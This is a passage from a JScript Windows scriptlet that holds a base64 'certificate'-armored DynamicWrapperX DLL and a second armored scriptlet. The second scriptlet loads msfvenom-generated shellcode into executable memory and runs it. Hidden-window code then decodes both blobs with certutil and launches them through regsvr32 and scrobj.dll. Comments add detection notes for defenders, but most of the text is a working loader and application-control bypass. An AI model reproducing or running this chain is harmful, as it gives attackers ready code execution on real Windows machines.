YwBXAHIAYQBwAHAAZQByAFgAAAAuAAUAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMA\
aQBvAG4AAAAxAC4AMAAwAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8A\
AAAAACQABAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAACQTkBAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
/yXoYAAQ/yXsYAAQ/yXwYAAQ/yX0YAAQ/yX4YAAQ/yX8YAAQ/yUAYQAQ/yUEYQAQ\
/yUIYQAQ/yUMYQAQ/yUQYQAQ/yUUYQAQ/yUYYQAQ/yUcYQAQ/yUkYQAQ/yUoYQAQ\
/yUsYQAQ/yUwYQAQ/yU4YQAQ/yVAYQAQ/yVEYQAQ/yVIYQAQUGEAAAAAAAAAAAAA\
uGEAAOhgAACMYQAAAAAAAAAAAADSYgAAJGEAAKBhAAAAAAAAAAAAAAhjAAA4YQAA\
qGEAAAAAAAAAAAAAIGMAAEBhAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMVhAADiYQAA\
8mEAAARiAAAaYgAALGIAADpiAABIYgAAYGIAAHhiAACGYgAAlmIAAKxiAADCYgAA\
AAAAAN1iAADoYgAA8mIAAP5iAAAAAAAAEmMAAAAAAAAtYwAAPmMAAE5jAAAAAAAA\
xWEAAOJhAADyYQAABGIAABpiAAAsYgAAOmIAAEhiAABgYgAAeGIAAIZiAACWYgAA\
rGIAAMJiAAAAAAAA3WIAAOhiAADyYgAA/mIAAAAAAAASYwAAAAAAAC1jAAA+YwAA\
TmMAAAAAAABLRVJORUwzMi5kbGwAhABEaXNhYmxlVGhyZWFkTGlicmFyeUNhbGxz\
AAA6AkxvYWRMaWJyYXJ5QQAAkAFHZXRQcm9jQWRkcmVzcwAAbAFHZXRNb2R1bGVG\
aWxlTmFtZUEAAAIBR2V0Q29tbWFuZExpbmVBAOkARnJlZUxpYnJhcnkA4wFHbG9i\
YWxBbGxvYwAWAkludGVybG9ja2VkSW5jcmVtZW50AAASAkludGVybG9ja2VkRGVj\
cmVtZW50AADqAUdsb2JhbEZyZWUAAD0CTG9hZExpYnJhcnlXAAB3A1dpZGVDaGFy\
VG9NdWx0aUJ5dGUAXQJNdWx0aUJ5dGVUb1dpZGVDaGFyALwCUnRsTW92ZU1lbW9y\
eQBtc3ZjcnQuZGxsAPgCc3ByaW50ZgAABANzdHJsZW4AACgCX3djc2ljbXAAACwD\
d2NzbGVuAABvbGUzMi5kbGwA1QBJc0VxdWFsR1VJRABPTEVBVVQzMi5kbGwAWABT\
eXNBbGxvY1N0cmluZwBbAFN5c0ZyZWVTdHJpbmcAWgBTeXNBbGxvY1N0cmluZ0xl\
bgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAA1dfhIAAAAAFxwAAABAAAABQAAAAUAAABIcAAA\
NHAAAChwAAAAAAEAAgADAAQAAABpcAAAeXAAAItwAACWcAAAqHAAAB4QAABwEgAA\
UhIAADEQAADnEQAAZHlud3JhcHguZGxsAERsbENhblVubG9hZE5vdwBEbGxHZXRD\
bGFzc09iamVjdABEbGxJbnN0YWxsAERsbFJlZ2lzdGVyU2VydmVyAERsbFVucmVn\
aXN0ZXJTZXJ2ZXIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
ABAAAKgAAAAOMB8wJTA+MFMwYzBzMJEwmzCgMKUwCTFNMVIxVzGGMZIxoTHaMfEx\
AjISMhgyJDIqMl0yejKRMrwyzTIhMywzMzN0M4MznjOvMxg0PzS8NO829TYRN/03\
CjitOLU4wzjWODg5WjpgOmY6kzqbOqE6HTsiO0Q7ijvGOwY8FTwkPDM8QjxRPGA8\
bzx+PJA8ojy0PMY82DzqPPw8IT0rPUQ9ACAAADQAAAAoMWIxoDHaMREyVDL7NAE1\
GDWQNZY1iTaPNq82tza9NtY2JDcsNzI3SjcAAAAwAAAQAAAAKDAwMDgwRjAAQAAA\
gAEAAOgw7DDwMPQw+DD8MAAxBDEIMQwxEDEUMRgx3DHgMeQx6DHsMfwxADIEMggy\
DDIcMiAyJDIoMiwyPDJAMkQySDJMMlAyWDJcMmAyZDJoMmwyfDKAMoQyiDKMMpwy\
oDKkMqgyrDK8MsAyxDLIMswy3DLgMuQy6DLsMvwyADMEMwgzDDM4M1gzeDN8M4Az\
hDOIM4wzlDOcM6AzpDOoM6wztDO8M8AzxDPIM8wz1DPcM+Az5DPoM+wz9DP8MwA0\
BDQINAw0FDQcNCA0JDQoNCw0NDQ8NEA0RDRINEw0VDRcNGA0ZDRoNGw0dDR8NIA0\
hDSINIw0lDScNKA0pDSoNKw0tDTYNPg0GDUcNSA1JDUoNSw1MDU0NTg1PDVANUQ1\
SDVMNVA1VDVYNVw1YDVkNWg1bDWkNcg11DXYNdw1ADYMNhA2FDYYNjQ2QDZENkg2\
TDZ0NoA2hDaINow2rDa4Nrw2wDbENvw2CDcMNxA3FDdEN1A3VDdYN1w3AAAAYAAA\
NAAAAAIwCDAOMBQwGjAgMCYwLDAyMDgwPjBEMEowUDBWMFwwYjBoMG4wdDB6MIAw\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAA==\
-----END CERTIFICATE-----"
var shellcode = "-----BEGIN CERTIFICATE-----\
PD9YTUwgdmVyc2lvbj0iMS4wIj8+DQo8c2NyaXB0bGV0Pg0KPHJlZ2lzdHJhdGlv\
biANCiAgICBwcm9naWQ9IlBvQyINCiAgICBjbGFzc2lkPSJ7RjAwMDExMTEtMDAw\
MC0wMDAwLTAwMDAtMDAwMEZFRURBQ0RDfSIgPg0KCTwhLS0gUHJvb2YgT2YgQ29u\
Y2VwdCAtIENhc2V5IFNtaXRoIEBzdWJUZWUgLS0+DQoJPCEtLSAgTGljZW5zZTog\
QlNEMy1DbGF1c2UgLS0+DQoJPCEtLSAgQ2FsbCB3aXRoIEM6XFdpbmRvd3NcU3lz\
d293NjRccmVnc3ZyMzIuZXhlIC0geDg2IG9ubHkgZm9yIG5vdyAtLT4NCgk8c2Ny\
aXB0IGxhbmd1YWdlPSJKU2NyaXB0Ij4NCgkJPCFbQ0RBVEFbDQoJDQoJCQkvL0M6\
XFdpbmRvd3Ncc3lzd293NjRcY3NjcmlwdC5leGUgDQoNCgkJCURYID0gbmV3IEFj\
dGl2ZVhPYmplY3QoIkR5bmFtaWNXcmFwcGVyWCIpOyAvLyBDcmVhdGUgYW4gb2Jq\
ZWN0IGluc3RhbmNlLg0KCQkJRFguUmVnaXN0ZXIoImtlcm5lbDMyLmRsbCIsICJW\
aXJ0dWFsQWxsb2MiLCAiaT1sdXV1IiwgInI9dSIpOw0KCQkJdmFyIG1lbUxvY2F0\
aW9uID0gRFguVmlydHVhbEFsbG9jKDAsIDB4MTAwMCwgMHgxMDAwLCAweDQwICk7\
DQoJCQlEWC5SZWdpc3Rlcigia2VybmVsMzIuZGxsIiwgIkdldEN1cnJlbnRQcm9j\
ZXNzIiwgInI9aCIpOyAgICANCgkJCXZhciBwcm9jSGFuZGxlID0gRFguR2V0Q3Vy\
cmVudFByb2Nlc3MoKTsgDQoJCQkJCQkNCgkJCXZhciBzY0xvY2F0aW9uID0gRFgu\
VmlydHVhbEFsbG9jKDAsIDB4MTAwMCwgMHgxMDAwLCAweDQwICk7CQkNCgkJCS8v\
V1NjcmlwdC5FY2hvKHNjTG9jYXRpb24udG9TdHJpbmcoMTYpKTsNCgkJCS8vRFgu\
TnVtUHV0KDB4Y2Msc2NMb2NhdGlvbiwwKTsgLy9Mb29wIEhlcmUgVG8gV3JpdGUg\
QXJyYXkgb2YgU2hlbGxjb2RlDQoJCQkvL0RYLk51bVB1dCgweDkwLHNjTG9jYXRp\
b24sMSk7DQoNCgkJCS8vbXNmdmVub20gLXAgd2luZG93cy9leGVjIC1hIHg4NiAt\
LXBsYXRmb3JtIHdpbiAtZSB4ODYvc2hpa2F0YV9nYV9uYWkgLWYgY3NoYXJwIENN\
RD1jYWxjLmV4ZSBFWElURlVOQz10aHJlYWQgDQoJCQl2YXIgc2MgPSBbMHhkZCww\
eGM2LDB4YjgsMHg1MCwweDZlLDB4YzQsMHhlMiwweGQ5LDB4NzQsMHgyNCwweGY0\
LDB4NWIsMHgyYiwweGM5LDB4YjEsDQoJCQkweDMxLDB4MzEsMHg0MywweDE4LDB4\
ODMsMHhjMywweDA0LDB4MDMsMHg0MywweDQ0LDB4OGMsMHgzMSwweDFlLDB4OGMs\
MHhkMiwNCgkJCTB4YmEsMHhkZiwweDRjLDB4YjMsMHgzMywweDNhLDB4N2QsMHhm\
MywweDIwLDB4NGUsMHgyZCwweGMzLDB4MjMsMHgwMiwweGMxLA0KCQkJMHhhOCww\
eDY2LDB4YjcsMHg1MiwweGRjLDB4YWUsMHhiOCwweGQzLDB4NmIsMHg4OSwweGY3\
LDB4ZTQsMHhjMCwweGU5LDB4OTYsDQoJCQkweDY2LDB4MWIsMHgzZSwweDc5LDB4\
NTcsMHhkNCwweDMzLDB4NzgsMHg5MCwweDA5LDB4YjksMHgyOCwweDQ5LDB4NDUs\
MHg2YywNCgkJCTB4ZGQsMHhmZSwweDEzLDB4YWQsMHg1NiwweDRjLDB4YjUsMHhi\
NSwweDhiLDB4MDQsMHhiNCwweDk0LDB4MWQsMHgxZiwweGVmLA0KCQkJMHgzNiww\
eDlmLDB4Y2MsMHg5YiwweDdlLDB4ODcsMHgxMSwweGExLDB4YzksMHgzYywweGUx\
LDB4NWQsMHhjOCwweDk0LDB4MzgsDQoJCQkweDlkLDB4NjcsMHhkOSwweGY1LDB4\
NmMsMHg3OSwweDFkLDB4MzEsMHg4ZiwweDBjLDB4NTcsMHg0MiwweDMyLDB4MTcs\
MHhhYywNCgkJCTB4MzksMHhlOCwweDkyLDB4MzcsMHg5OSwweDdiLDB4MDQsMHg5\
YywweDE4LDB4YWYsMHhkMywweDU3LDB4MTYsMHgwNCwweDk3LA0KCQkJMHgzMCww\
eDNhLDB4OWIsMHg3NCwweDRiLDB4NDYsMHgxMCwweDdiLDB4OWMsMHhjZiwweDYy\
LDB4NTgsMHgzOCwweDk0LDB4MzEsDQoJCQkweGMxLDB4MTksMHg3MCwweDk3LDB4\
ZmUsMHg3YSwweGRiLDB4NDgsMHg1YiwweGYwLDB4ZjEsMHg5ZCwweGQ2LDB4NWIs\
MHg5ZiwNCgkJCTB4NjAsMHg2NCwweGU2LDB4ZWQsMHg2MywweDc2LDB4ZTksMHg0\
MSwweDBjLDB4NDcsMHg2MiwweDBlLDB4NGIsMHg1OCwweGExLA0KCQkJMHg2Yiww\
eGIzLDB4YmEsMHg2MCwweDgxLDB4NWMsMHg2MywweGUxLDB4MjgsMHgwMSwweDk0\
LDB4ZGYsMHg2ZSwweDNjLDB4MTcsDQoJCQkweGVhLDB4MGUsMHhiYiwweDA3LDB4\
OWYsMHgwYiwweDg3LDB4OGYsMHg3MywweDYxLDB4OTgsMHg2NSwweDc0LDB4ZDYs\
MHg5OSwNCgkJCTB4YWYsMHgxNywweGI5LDB4MDksMHgzMywweGY2LDB4NWMsMHhh\
YSwweGQ2LDB4MDYgIF07DQoNCg0KCQkJZm9yKHZhciBpID0gMDsgaSA8IHNjLmxl\
bmd0aDsgaSsrKQ0KCQkJew0KCQkJCURYLk51bVB1dChzY1tpXSxzY0xvY2F0aW9u\
LGkpOw0KCQkJfQ0KDQoNCgkJCURYLlJlZ2lzdGVyKCJrZXJuZWwzMi5kbGwiLCJD\
cmVhdGVUaHJlYWQiLCJpPXV1bGx1Iiwicj11IiApOw0KCQkJdmFyIHRocmVhZCA9\
IERYLkNyZWF0ZVRocmVhZCgwLDAsc2NMb2NhdGlvbiwwLDApOw0KDQoJCQlEWC5S\
ZWdpc3Rlcigia2VybmVsMzIuZGxsIiwgIldhaXRGb3JTaW5nbGVPYmplY3QiLCAi\
aT11dSIsICJyPXUiKTsNCgkJCURYLldhaXRGb3JTaW5nbGVPYmplY3QodGhyZWFk\
LDB4RkZGRkZGRkYpOw0KDQoJCQkvKg0KCQkJRFguUmVnaXN0ZXIoInVzZXIzMi5k\
bGwiLCAiTWVzc2FnZUJveFciLCAiaT1od3d1IiwgInI9bCIpOyAgLy8gUmVnaXN0\
ZXIgYSBkbGwgZnVuY3Rpb24uDQoJCQlyZXMgPSBEWC5NZXNzYWdlQm94VygwLCAi\
U2hlbGxDb2RlIEF0ICIgKyBtZW1Mb2NhdGlvbi50b1N0cmluZygxNikgLCAiVGVz\
dCIsIDQpOyAgICAgICAgLy8gQ2FsbCB0aGUgZnVuY3Rpb24uDQoJCQlyZXMgPSBE\
WC5NZXNzYWdlQm94VygwLCAiSGFuZGxlIE9idGFpbmVkICIgKyBwcm9jSGFuZGxl\
LnRvU3RyaW5nKDE2KSAsICJUZXN0IiwgNCk7ICAgICAgICAvLyBDYWxsIHRoZSBm\
dW5jdGlvbi4NCgkJCSovDQoJCQkvL2h0dHBzOi8vbXNkbi5taWNyb3NvZnQuY29t\
L2VuLXVzL2xpYnJhcnkvd2luZG93cy9kZXNrdG9wL2FhMzY2ODg3KHY9dnMuODUp\
LmFzcHgNCgkJCS8vaHR0cHM6Ly9tc2RuLm1pY3Jvc29mdC5jb20vZW4tdXMvbGli\
cmFyeS93aW5kb3dzL2Rlc2t0b3AvbXM2ODMxNzkodj12cy44NSkuYXNweA0KCQkJ\
Ly9HZXRDdXJyZW50UHJvY2Vzcw0KCQkJLy9odHRwczovL21zZG4ubWljcm9zb2Z0\
LmNvbS9lbi11cy9saWJyYXJ5L3dpbmRvd3MvZGVza3RvcC9tczY4MTY3NCh2PXZz\
Ljg1KS5hc3B4DQoJCQkvL2h0dHBzOi8vbXNkbi5taWNyb3NvZnQuY29tL2VuLXVz\
L2xpYnJhcnkvd2luZG93cy9kZXNrdG9wL21zNjgyNDUzKHY9dnMuODUpLmFzcHgN\
CgkNCgkJXV0+DQo8L3NjcmlwdD4NCjwvcmVnaXN0cmF0aW9uPg0KPC9zY3JpcHRs\
ZXQ+\
-----END CERTIFICATE-----"
// Drop-and-run sequence. Both branches perform the same five steps and differ
// only in which regsvr32.exe path they launch:
//   1. write the armored DLL blob to DynamicWrapperX.txt
//   2. certutil.exe /decode it to x86.dll
//   3. regsvr32 /s /i x86.dll   (silent registration of the decoded DLL)
//   4. write the second blob to shellcode.txt and certutil /decode it to shellcode.sct
//   5. regsvr32 /u /i:shellcode.sct scrobj.dll   (runs the decoded scriptlet)
// Every Run() call passes window style 0 (hidden) and no wait flag, so the child
// processes are started asynchronously; the fixed 5-second sleeps are the only
// sequencing, and no return value is checked.
//
// Detection / mitigation notes for defenders:
//   - Process-creation telemetry: certutil.exe with "/decode", and regsvr32.exe
//     with "/i:" plus "scrobj.dll" (ATT&CK T1140 and T1218.010).
//   - File telemetry: DynamicWrapperX.txt, x86.dll, shellcode.txt and shellcode.sct
//     are written with relative names, i.e. into the current directory of the host process.
//   - Application-control policy should cover scriptlets loaded through
//     regsvr32/scrobj.dll, not only script-host rules; that gap is what the
//     page description relies on.

// Read PROCESSOR_ARCHITECTURE from the process environment block.
// NOTE(review): this reflects the hosting process, so under the 32-bit
// SysWow64 regsvr32 named in the description it presumably reads "x86"
// and the else branch runs - confirm.
var WshShell = new ActiveXObject("WScript.Shell");
var WshProcEnv = WshShell.Environment("Process");
var process_arch = WshProcEnv("PROCESSOR_ARCHITECTURE");
if(process_arch == "AMD64")
{
// 64-bit host: use the 32-bit regsvr32 under SysWOW64 for the x86 DLL.
SaveStringToFile("DynamicWrapperX.txt", x86dllEncoded);
var r = new ActiveXObject("WScript.Shell").Run("certutil.exe /decode DynamicWrapperX.txt x86.dll", 0);
sleep(5000);
var execFilex64 = new ActiveXObject("WScript.Shell").Run("C:\\Windows\\SysWOW64\\regsvr32.exe /s /i x86.dll", 0);
// Despite its name, the "shellcode" variable holds an armored scriptlet; it is decoded to shellcode.sct.
SaveStringToFile("shellcode.txt", shellcode);
sleep(5000);
var x = new ActiveXObject("WScript.Shell").Run("certutil.exe /decode shellcode.txt shellcode.sct", 0 );
sleep(5000);
var execShellCode = new ActiveXObject("WScript.Shell").Run("C:\\Windows\\SysWOW64\\regsvr32.exe /u /i:shellcode.sct scrobj.dll", 0);
}
else
{
// Any other architecture value: same steps, launched through System32\regsvr32.exe.
SaveStringToFile("DynamicWrapperX.txt", x86dllEncoded);
var r = new ActiveXObject("WScript.Shell").Run("certutil.exe /decode DynamicWrapperX.txt x86.dll", 0);
sleep(5000);
var execFilex86 = new ActiveXObject("WScript.Shell").Run("C:\\Windows\\System32\\regsvr32.exe /s /i x86.dll", 0);
// Despite its name, the "shellcode" variable holds an armored scriptlet; it is decoded to shellcode.sct.
SaveStringToFile("shellcode.txt", shellcode);
sleep(5000);
var x = new ActiveXObject("WScript.Shell").Run("certutil.exe /decode shellcode.txt shellcode.sct", 0 );
sleep(5000);
var execShellCode = new ActiveXObject("WScript.Shell").Run("C:\\Windows\\System32\\regsvr32.exe /u /i:shellcode.sct scrobj.dll", 0);
}
]]>
</script>
</registration>
</scriptlet>